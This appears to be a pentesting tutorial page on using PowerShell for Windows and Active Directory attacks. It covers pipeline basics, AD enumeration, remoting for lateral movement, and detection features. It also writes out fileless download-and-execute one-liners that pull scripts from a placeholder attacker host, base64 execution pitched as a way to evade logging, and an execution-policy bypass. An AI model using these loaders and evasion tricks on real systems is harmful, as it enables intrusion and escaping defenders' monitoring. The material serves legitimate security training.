PowerShell for Hacking
PowerShell is at once Windows’ administration tool and the attacker’s favorite weapon in that environment. It’s installed everywhere, trusted by the system, accesses the whole .NET Framework and WMI, and lets you operate without touching disk (fileless). For the Windows & AD area, knowing PowerShell is the difference between copying commands and understanding what you do.
Differences from cmd and the basics
Section titled “Differences from cmd and the basics”Unlike cmd (which passes text), PowerShell passes objects between commands (cmdlets), making processing far more powerful.
Get-ChildItem # ls / dirGet-Content file.txt # catGet-Process # processes (objects, not text)Get-ServiceGet-Help <cmdlet> # built-in help# cmdlets follow Verb-Noun: Get-, Set-, New-, Invoke-, Start-The object pipeline (the superpower)
Section titled “The object pipeline (the superpower)”Get-Process | Where-Object {$_.CPU -gt 100} | Sort-Object CPU -Descending | Select-Object -First 5Get-Service | Where-Object {$_.Status -eq "Running"}$_ is the current pipeline object; Where-Object filters, Select-Object picks properties, Sort-Object sorts.
Windows/AD enumeration with PowerShell
Section titled “Windows/AD enumeration with PowerShell”whoami ; $env:USERNAME ; $env:COMPUTERNAMEGet-LocalUser ; Get-LocalGroupMember Administrators# AD module / PowerViewGet-ADUser -Filter * ; Get-ADGroupMember "Domain Admins"Get-NetUser ; Get-NetGroup ; Get-NetComputer # PowerView (see ad-enum)In-memory download and execution (fileless)
Section titled “In-memory download and execution (fileless)”What makes PowerShell so used by attackers: running without writing to disk.
IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP/script.ps1')# or with Invoke-WebRequestIWR http://YOUR_IP/tool.ps1 | IEX# base64 execution (evades simple logging)powershell -enc <base64>This is how tools like PowerView, Invoke-Mimikatz, PowerUp are loaded into memory.
Remoting (administration/lateral)
Section titled “Remoting (administration/lateral)”Enter-PSSession -ComputerName host -Credential (Get-Credential)Invoke-Command -ComputerName host -ScriptBlock { whoami }PowerShell Remoting (WinRM, port 5985) is legitimate administration and lateral movement at once (see Lateral Movement).
What the Blue Team knows (and why it matters to you)
Section titled “What the Blue Team knows (and why it matters to you)”PowerShell is heavily watched: Script Block Logging (4104) records the script after deobfuscation, AMSI inspects it before execution, and Constrained Language Mode limits what you can do. That’s why the evasion area (see Defense Evasion (AMSI / AV / EDR)) spends so much on getting past these defenses. The Execution Policy is NOT security: it’s bypassed with -ep bypass.
Why it matters in security
Section titled “Why it matters in security”In a Windows/AD environment, PowerShell is your enumeration interpreter, your in-memory tool loader, and your lateral-movement mechanism. Almost all offensive AD tools (PowerView, PowerUp, Rubeus via reflection) are used from PowerShell. Understanding it is operating with judgment in the biggest terrain of internal pentesting.
Mastery checklist
Section titled “Mastery checklist”- I understand PowerShell passes objects, not text
- I use the pipeline with Where-Object/Select-Object/Sort-Object and $_
- I enumerate users, groups, and processes (Get-*)
- I load scripts in memory with IEX/DownloadString (fileless)
- I use PowerShell Remoting (Enter-PSSession/Invoke-Command)
- I know what AMSI, Script Block Logging, and Constrained Language Mode are
- I understand Execution Policy is not a security control